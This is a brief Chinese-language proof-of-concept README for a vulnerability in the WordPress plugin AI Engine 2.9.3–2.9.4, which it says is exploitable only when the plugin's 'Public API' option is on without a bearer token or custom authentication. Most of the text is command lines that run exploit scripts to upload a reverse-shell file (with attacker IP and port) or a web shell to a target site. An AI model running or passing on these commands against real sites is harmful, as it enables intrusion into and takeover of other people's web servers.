Wordpress插件 AI Engine 2.9.3 - 2.9.4 概念验证
请注意,此漏洞仅在启用“Public API”选项时才能被利用,该选项默认是禁用的,并且没有配置Bearer Token,也没有添加和用于保护API的自定义身份验证。
python3 exploit-auto.py --url "http://target.com" --username "Admin" --password "L87*********C4u" --file reverse.php --attacker-ip 127.0.0.1 --attacker-port 4444
python3 exploit.py \
--url "http://target.com/" \
--username "Admin" \
--password "L87*********C4u" \
--file shell.php